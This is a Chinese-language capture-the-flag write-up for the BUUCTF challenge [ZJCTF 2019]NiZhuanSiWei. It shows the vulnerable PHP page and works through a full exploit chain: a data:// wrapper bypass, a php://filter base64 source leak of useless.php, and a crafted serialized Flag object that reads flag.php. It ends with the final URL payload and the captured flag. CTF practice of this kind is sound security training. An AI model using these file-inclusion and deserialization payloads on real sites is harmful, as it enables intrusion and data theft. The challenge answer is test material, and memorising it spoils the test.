BUUCTF [ZJCTF 2019]NiZhuanSiWei

2023-10-24 10:47:04

  1. 打开网页
 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

需要get方式提交参数,text、file、password

  1. 第一个需要绕过的地方
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

要求text非空,且从text里读取字符串,还要和welcome to the zjctf相等
这时候就用到了data:// 写入协议
先构造第一个payload
?text=data://text/plain,welcome to the zjctf
下面我们不能用flag.php来访问,因为被正则匹配,我们就拿不到反序列化后的password了

if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }
  1. 反序列化password
    看到了useless.php文件包含,在这之前我们需要先读取里面的源码,然后将password反序列化出来
    构造第二个payload
    file=php://filter/read=convert.base64-encode/resource=useless.php
    得到
    PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo
    经过base64解码得到
<?php

class Flag{  //flag.php 
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>

得到源码之后,将这个源码中的$file赋值flag.php,反序列化一下

<?php

class Flag{  //flag.php 
    public $file="flag.php";
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>

利用php解释器执行上面代码,得到反序列化的password
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
4. 最终payload
text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;}
访问进入

BUUCTF [ZJCTF 2019]NiZhuanSiWei

  1. 查看源码得到flag
    flag{17fb0a9c-1875-432f-aa25-3a75bc9ce6b7}




参考链接:
https://www.cnblogs.com/junlebao/p/13821921.html

上一篇:ZJCTF,不过如此


下一篇:[ZJCTF 2019]NiZhuanSiWei 1